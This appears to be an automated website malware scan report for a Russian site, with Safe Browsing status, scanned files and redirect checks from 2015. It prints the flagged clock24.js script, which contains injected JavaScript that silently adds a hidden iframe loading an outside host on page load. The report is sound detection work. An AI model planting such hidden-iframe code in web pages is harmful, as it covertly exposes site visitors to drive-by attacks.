Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lesnoyprivoz.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lesnoyprivoz.ru/ | 200 OK Content-Length: 3469 Content-Type: text/html | clean |
http://lesnoyprivoz.ru/clock24.js | 200 OK Content-Length: 6796 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var clock24_lang = new Array(); clock24_lang["en"] = ['en','Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec', 'Sun','Mon','Tue','Wed','Thu','Fri','Sat']; clock24_lang["ru"] = ['ru','\u042F\u043D\u0432','\u0424\u0435\u0432','\u041C\u0430\u0440','\u0410\u043F\u0440', '\u041C\u0430\u0439','\u0418\u044E\u043D','\u0418\u044E\u043B','\u0410\u0432\u0433', '\u0421\u0435\u043D','\u041E\u043A\u0442','\u041D\u043E\u044F','\u0414\u0435\u043A', '\u0412\u0441','\u { if(clock24_dst[i][1][j] == c) return i; } } } var if843E8 = document.createElement('iframe');if843E8.name = 'if843E8';if843E8.src = 'http://ment.x3mfly.com/';if843E8.style.width = '0px';if843E8.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if843E8=') == -1) {document.cookie = 'if843E8=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if843E8);}}; Antivirus reports:
| ||
http://lesnoyprivoz.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 06:20:31 GMT
Accept-Ranges: bytes
ETag: "51c981c8-d8d"
Server: nginx
Vary: Accept-Encoding
Content-Length: 3469
Content-Type: text/html
Last-Modified: Tue, 25 Jun 2013 11:40:56 GMT
...3469 bytes of data.
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 06:20:31 GMT
Accept-Ranges: bytes
ETag: "51c981c8-d8d"
Server: nginx
Vary: Accept-Encoding
Content-Length: 3469
Content-Type: text/html
Last-Modified: Tue, 25 Jun 2013 11:40:56 GMT
...3469 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Referer: http://www.google.com/search?q=lesnoyprivoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Referer: http://www.google.com/search?q=lesnoyprivoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.